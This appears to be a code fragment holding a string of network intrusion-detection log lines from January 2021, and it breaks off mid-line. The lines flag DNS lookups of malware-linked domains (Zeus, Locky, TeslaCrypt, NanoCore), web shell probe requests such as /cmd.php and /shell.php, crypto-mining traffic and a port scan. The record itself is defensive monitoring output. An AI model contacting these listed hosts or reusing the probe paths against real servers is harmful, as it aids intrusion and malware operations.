    '"2021-01-11 03:37:31.138038" r2d2 178.17.174.14 41824 2.200.109.24 80 TCP UA "Synapse (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.30729; MS-RTC LM 8; SynapseWorkstation.3.2.1; .NET CLR 3.0.4506.2152\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:37:43.381563" r2d2 2.200.110.232 64803 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:37:43.383259" r2d2 2.200.107.146 30320 204.16.253.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:37:45.911268" r2d2 10.43.192.103 58833 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:37:47.953147" r2d2 178.17.174.14 42296 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.5; OfficeLivePatch.1.3; FunWebProducts; BRI/2; msn OptimizedIE8;ENGB\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:37:47.953144" r2d2 178.17.174.14 42296 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.5; OfficeLivePatch.1.3; FunWebProducts; BRI/2; msn OptimizedIE8;ENGB\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:37:54.487009" r2d2 10.44.194.4 60196 51.178.161.234 443 TCP IPORT 51.178.161.234:443 "latentbot (malware)" (static)\n' +
    '"2021-01-11 03:37:57.006450" r2d2 45.144.136.187 51341 2.200.110.170 80 TCP URL (2.200.110.170)/mysql.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:37:57.006456" r2d2 45.144.136.187 51341 2.200.110.170 80 TCP URL (2.200.110.170)/mysql.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:37:53.061743" r2d2 178.17.174.14 42462 2.200.109.24 80 TCP UA "IE0006_ver1 (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; CMDTDF; .NET CLR 1.1.4322; InfoPath.3; BRI/2; AskTbORJ/5.15.15.36191; IE0006_ver1;EN_US\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:37:57.980457" r2d2 10.43.192.103 58836 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:37:58.179158" r2d2 2.200.110.233 65129 2.200.107.168 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:37:58.341636" r2d2 2.200.107.146 22488 194.85.252.62 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 03:37:58.339931" r2d2 2.200.110.233 63671 2.200.107.168 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 03:37:59.640687" r2d2 2.200.110.232 64917 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:37:59.643314" r2d2 2.200.107.146 39735 45.54.64.53 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:38:00.422022" r2d2 2.200.107.146 38605 45.175.22.4 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 03:38:00.419740" r2d2 2.200.110.233 65483 2.200.107.168 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 03:38:01.430976" r2d2 2.200.110.233 64359 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:38:11.865180" r2d2 45.144.136.187 51341 2.200.110.170 80 TCP URL (2.200.110.170)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:38:11.865175" r2d2 45.144.136.187 51341 2.200.110.170 80 TCP URL (2.200.110.170)/cmd.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:38:22.121886" r2d2 10.43.192.103 58841 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:38:20.569892" r2d2 10.1.19.42 59594 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:38:28.166350" r2d2 10.43.192.103 58842 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:38:34.208863" r2d2 10.43.192.103 58844 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:38:43.382576" r2d2 2.200.110.232 63808 2.200.107.168 53 UDP DNS (www).porezna-uprava.org "balkanrat (malware)" (static)\n' +
    '"2021-01-11 03:38:43.394536" r2d2 2.200.110.232 64470 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:38:43.397505" r2d2 2.200.107.146 1101 52.58.214.33 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:38:44.875714" r2d2 10.3.160.42 13827 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:38:44.973859" r2d2 10.3.160.42 13827 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:38:45.079240" r2d2 10.3.160.42 13827 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:38:45.270405" r2d2 10.3.160.42 13827 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:38:46.471426" r2d2 10.3.160.42 13827 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:38:48.730805" r2d2 2.200.107.146 24149 185.42.137.102 53 UDP DNS ns1.frobbit.se "rogue dns (malicious)" (static)\n' +
    '"2021-01-11 03:38:52.331277" r2d2 10.43.192.103 58847 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:38:58.364253" r2d2 10.43.192.103 58849 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:38:59.607514" r2d2 2.200.110.232 49277 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:38:59.608206" r2d2 2.200.110.232 49461 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:38:59.609479" r2d2 2.200.107.146 29974 192.12.94.30 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:39:04.397068" r2d2 10.43.192.103 58850 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:39:07.791387" r2d2 2.200.110.233 49207 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.42kdb12.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:39:08.181136" r2d2 2.200.110.233 64372 2.200.107.168 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:39:08.182593" r2d2 2.200.107.146 27758 97.74.100.21 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:39:08.492931" r2d2 2.200.110.233 63480 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:39:09.111162" r2d2 2.200.110.233 65097 2.200.107.168 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 03:39:10.212948" r2d2 45.144.136.187 12762 2.200.110.170 80 TCP URL (2.200.110.170)/mm.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:39:10.212944" r2d2 45.144.136.187 12762 2.200.110.170 80 TCP URL (2.200.110.170)/mm.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:39:11.432159" r2d2 2.200.110.232 64214 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:39:11.463887" r2d2 2.200.110.233 64939 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:39:15.681772" r2d2 2.200.110.233 64748 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:39:15.797688" r2d2 45.144.136.187 12762 2.200.110.170 80 TCP URL (2.200.110.170)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:39:15.797685" r2d2 45.144.136.187 12762 2.200.110.170 80 TCP URL (2.200.110.170)/shell.php "web shells (suspicious)" (static)\n' +
    '"2021-01-11 03:39:20.128936" r2d2 2.200.110.233 64748 2.200.107.169 53 UDP DNS 7tno4hib47vlep5o.tor2web.fi "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:39:21.494987" r2d2 2.200.110.232 63666 2.200.107.168 53 UDP DNS qaloqum.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:39:21.496485" r2d2 2.200.107.146 28637 205.251.192.150 53 UDP DNS qaloqum.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:39:21.524684" r2d2 2.200.110.233 64014 2.200.107.168 53 UDP DNS qaloqum.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:39:25.150094" r2d2 2.200.107.146 18946 205.251.193.7 53 UDP DNS jafuq.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:39:25.148344" r2d2 2.200.110.232 63846 2.200.107.168 53 UDP DNS jafuq.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:39:25.175582" r2d2 2.200.107.146 29053 205.251.193.7 53 UDP DNS jafuq.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:39:25.173822" r2d2 2.200.110.233 64631 2.200.107.168 53 UDP DNS jafuq.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:39:28.554744" r2d2 10.43.192.103 58912 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:39:34.571265" r2d2 10.43.192.103 58915 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:39:40.618058" r2d2 10.43.192.103 58918 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:39:58.746801" r2d2 10.43.192.103 58923 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:39:59.625934" r2d2 2.200.110.232 65195 2.200.107.168 53 UDP DNS (www.2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 03:40:16.883827" r2d2 10.43.192.103 58939 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:40:12.655496" r2d2 10.1.19.42 59602 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:40:20.453731" r2d2 2.200.110.233 63776 2.200.107.168 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 03:40:20.455217" r2d2 2.200.107.146 17949 190.9.129.56 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 03:40:21.462213" r2d2 2.200.110.232 64963 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:40:22.112235" r2d2 2.200.110.232 64898 2.200.107.168 53 UDP DNS qaloqum.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:40:22.113567" r2d2 2.200.107.146 46193 205.251.197.89 53 UDP DNS qaloqum.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:40:34.998659" r2d2 10.43.192.103 58944 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:40:43.381432" r2d2 2.200.110.232 64437 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:40:43.384019" r2d2 2.200.107.146 63963 204.16.253.53 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:40:43.394937" r2d2 2.200.110.232 64213 2.200.107.168 53 UDP DNS (www).zagrebseba.net "balkanrat (malware)" (static)\n' +
    '"2021-01-11 03:40:51.173419" r2d2 178.17.174.14 48972 2.200.109.24 80 TCP UA "mozila(/yt\\(compatible;Macintosh;Trident/4.0;.NT CLR 2.0.50727;SLCC2;.NET CLR 3.5.30729;.NET CLR 3.0.30729;MALN5;.NET4.0C;.NET4.0E;\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:40:53.088373" r2d2 10.43.192.103 58947 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:40:51.173428" r2d2 178.17.174.14 48972 2.200.109.24 80 TCP UA "mozila(/yt\\(compatible;Macintosh;Trident/4.0;.NT CLR 2.0.50727;SLCC2;.NET CLR 3.5.30729;.NET CLR 3.0.30729;MALN5;.NET4.0C;.NET4.0E;\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:40:59.103497" r2d2 10.43.192.103 58958 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:40:51.173426" r2d2 178.17.174.14 48972 2.200.109.24 80 TCP UA "mozila(/yt\\(compatible;Macintosh;Trident/4.0;.NT CLR 2.0.50727;SLCC2;.NET CLR 3.5.30729;.NET CLR 3.0.30729;MALN5;.NET4.0C;.NET4.0E;\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:41:05.123373" r2d2 10.43.192.103 58976 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:41:11.167465" r2d2 10.43.192.103 58987 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:41:17.196413" r2d2 10.43.192.103 58998 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:41:18.025458" r2d2 121.152.249.240 58571 10.110.27.13 80 TCP UA "Hello, World" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:41:23.233210" r2d2 10.43.192.103 59000 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:41:18.025390" r2d2 121.152.249.240 58571 2.200.106.82 80 TCP UA "Hello, World" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:41:27.783474" r2d2 2.200.110.232 49445 2.200.107.168 53 UDP DNS (2td6).xyz "domain (suspicious)" (static)\n' +
    '"2021-01-11 03:41:27.933568" r2d2 2.200.110.232 64948 2.200.107.168 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 03:41:27.935529" r2d2 2.200.107.146 64946 192.43.172.30 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 03:41:27.978720" r2d2 2.200.110.233 63457 2.200.107.168 53 UDP DNS iynus.net "locky (malware)" (static)\n' +
    '"2021-01-11 03:41:27.963052" r2d2 2.200.110.232 65251 2.200.107.168 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:41:27.964401" r2d2 2.200.107.146 38141 173.201.76.9 53 UDP DNS foley.go2lightuniversity.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:41:27.983491" r2d2 2.200.110.232 64016 2.200.107.168 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:41:27.983555" r2d2 2.200.110.232 64322 2.200.107.168 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:41:28.020992" r2d2 2.200.110.233 65403 2.200.107.168 53 UDP DNS soaring.betsystemreviews.com "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:41:28.015731" r2d2 2.200.110.233 64540 2.200.107.168 53 UDP DNS (7tno4hib47vlep5o).42kjb11.net "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:41:28.213228" r2d2 2.200.110.232 63829 2.200.107.168 53 UDP DNS supervision.sactown.us "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:41:28.243206" r2d2 2.200.110.232 49365 2.200.107.168 53 UDP DNS banking.techpool.org "ek nuclear (malicious)" (static)\n' +
    '"2021-01-11 03:41:28.413545" r2d2 2.200.110.232 49281 2.200.107.168 53 UDP DNS tredokilo745241.ru "zeus (malware)" (static)\n' +
    '"2021-01-11 03:41:29.223023" r2d2 2.200.110.232 64256 2.200.107.168 53 UDP DNS recenthosts.ru "generic (malware)" (static)\n' +
    '"2021-01-11 03:41:29.264966" r2d2 10.43.192.103 59005 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:41:29.445678" r2d2 2.200.110.233 63549 2.200.107.168 53 UDP DNS un-blocking.info "bad wpad (suspicious)" (static)\n' +
    '"2021-01-11 03:41:30.623728" r2d2 2.200.110.232 63614 2.200.107.168 53 UDP DNS (www).jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 03:41:30.633407" r2d2 2.200.110.232 64660 2.200.107.168 53 UDP DNS jesusdenazaret.com.ve "locky (malware)" (static)\n' +
    '"2021-01-11 03:41:31.503229" r2d2 2.200.110.232 65348 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:41:31.539435" r2d2 2.200.110.233 64589 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:41:35.300659" r2d2 10.43.192.103 59015 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:41:35.241137" r2d2 178.17.174.14 33496 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; yie8\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:41:35.241094" r2d2 178.17.174.14 33496 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; yie8\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:41:35.241140" r2d2 178.17.174.14 33496 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; yie8\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:41:43.397537" r2d2 2.200.110.232 64235 2.200.107.168 53 UDP DNS hdgbcnuy73wjnho9jusrnhfhejfuy78wyi7jfknv.ydns.eu "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:41:43.538208" r2d2 2.200.107.146 20323 217.115.6.76 53 UDP DNS hdgbcnuy73wjnho9jusrnhfhejfuy78wyi7jfknv.ydns.eu "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:41:47.361377" r2d2 10.43.192.103 59023 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:41:47.437106" r2d2 2.200.110.232 63788 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:41:47.438686" r2d2 2.200.107.146 9615 52.50.73.4 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:41:47.486699" r2d2 2.200.110.233 65225 2.200.107.168 53 UDP DNS 7tno4hib47vlep5o.tor2web.blutmagie.de "teslacrypt (malware)" (static)\n' +
    '"2021-01-11 03:41:53.391866" r2d2 10.43.192.103 59026 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:41:59.428931" r2d2 10.43.192.103 59031 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:41:59.608512" r2d2 2.200.110.232 64400 2.200.107.168 53 UDP DNS atacoinc8897.hopto.org "nanocore (malware)" (static)\n' +
    '"2021-01-11 03:42:11.517040" r2d2 10.43.192.103 59033 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:42:15.891490" r2d2 2.200.110.232 49222 2.200.107.168 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 03:42:15.892904" r2d2 2.200.107.146 9472 205.251.199.82 53 UDP DNS (vio-ck-zvdnggdkkp).dynamic-m.com "dynamic domain (suspicious)" (static)\n' +
    '"2021-01-11 03:42:17.541352" r2d2 10.43.192.103 59034 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:42:29.618545" r2d2 10.43.192.103 59036 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:42:31.297679" r2d2 2.200.110.232 65391 2.200.107.168 53 UDP DNS cdnrep.reimage.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:42:31.299060" r2d2 2.200.107.146 7284 173.245.58.63 53 UDP DNS cdnrep.reimage.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:42:32.089149" r2d2 2.200.110.232 64765 2.200.107.168 53 UDP DNS (webservice).reimageplus.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:42:41.546676" r2d2 2.200.110.232 64671 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:42:41.585965" r2d2 2.200.110.233 65116 2.200.107.168 53 UDP DNS j0mla.sytes.net "generic (malware)" (static)\n' +
    '"2021-01-11 03:42:37.853163" r2d2 10.1.19.42 59604 208.68.240.103 80 TCP UA "OINC (BOINC client \\(windows_x86_64 7.16.7\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:42:46.239733" r2d2 10.3.160.42 14125 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:42:46.338093" r2d2 10.3.160.42 14125 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:42:46.437916" r2d2 10.3.160.42 14125 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:42:46.637548" r2d2 10.3.160.42 14125 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:42:47.757566" r2d2 10.43.192.103 59041 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:42:47.777906" r2d2 2.200.97.1 52160 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:42:47.837631" r2d2 10.3.160.42 14125 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:42:48.439825" r2d2 10.3.160.42 14125 8.8.8.8 53 UDP DNS checkip.dyndns.org "ipinfo (suspicious)" (static)\n' +
    '"2021-01-11 03:42:53.778616" r2d2 10.43.192.103 59042 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:42:54.073198" r2d2 10.1.81.47 57471 10.1.20.50 53 UDP DNS id.remoteutilities.com "rmsrat (malware)" (static)\n' +
    '"2021-01-11 03:42:59.373387" r2d2 10.1.81.47 55974 10.1.20.50 53 UDP DNS id.remoteutilities.com "rmsrat (malware)" (static)\n' +
    '"2021-01-11 03:42:59.373337" r2d2 10.1.81.47 55974 10.1.20.50 53 UDP DNS id.remoteutilities.com "rmsrat (malware)" (static)\n' +
    '"2021-01-11 03:42:59.373396" r2d2 10.1.81.47 55974 10.1.20.50 53 UDP DNS id.remoteutilities.com "rmsrat (malware)" (static)\n' +
    '"2021-01-11 03:43:04.216284" r2d2 2.200.110.232 64376 2.200.107.168 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 03:43:04.218209" r2d2 2.200.107.146 11316 46.101.179.64 53 UDP DNS (www).southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 03:43:05.863360" r2d2 10.43.192.103 59047 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:43:23.969835" r2d2 10.43.192.103 59052 213.252.245.223 452 TCP IPORT 213.252.245.223:452 "crypto mining (suspicious)" (static)\n' +
    '"2021-01-11 03:43:25.366646" r2d2 2.200.110.232 63885 2.200.107.168 53 UDP DNS southlife.church "locky (malware)" (static)\n' +
    '"2021-01-11 03:43:26.916381" r2d2 2.200.110.232 64515 2.200.107.168 53 UDP DNS qaloqum.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:43:26.918100" r2d2 2.200.107.146 3789 205.251.194.195 53 UDP DNS qaloqum.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:43:26.942519" r2d2 2.200.110.233 63420 2.200.107.168 53 UDP DNS qaloqum.com "pua (suspicious)" (static)\n' +
    '"2021-01-11 03:43:20.139439" r2d2 178.17.174.14 39604 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; GTB0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.1\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:43:20.139430" r2d2 178.17.174.14 39604 2.200.109.24 80 TCP UA "FunWebProducts (Mozilla/4.0 \\(compatible; MSIE 7.0; Windows NT 6.0; FunWebProducts; GTB0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.1\\))" "user agent (suspicious)" (heuristic)\n' +
    '"2021-01-11 03:43:32.000557" r2d2 2.200.108.59 12155,12156,12157,12158,12159,12161,33400,33812,36992,37816,40376,41626,42006,42526,42561,43576,43846,48326,48700,48703,50380,50610,54510,54566,57962 77.53.81.105 21,6581,9007,11050,12049,15556,18034,25218,33149,34293,35456,40697,41098,42849,43072,56300,62872 TCP IP 2.200.108.59 "potential port scanning" (heuristic)\n' +
    '"2021-01-11 03:43:32.000553" r2d2 2.200.108.59 12154,12161,12162,12164,12165,12167,12168,12170,12171,12172,12173,12175,12176,12177,32916,32998,33188,33224,33874,33920,34208,34910,35720,35780,36992,37030,37392,37874,39172,39542,39566,40054,40868,40980,41434,41454,42560,42563,42565,42566,43148,43846,44298,44470,44480,45520,46392,47030,47168,47952,48388,48410,48700,48702,48705,48760,49902,50552,52262,53164,53334,53956,53980,54296,54366,54828,55128,56512,56616,56950,57386,57520,57542,57752,60582 77.53.81.105 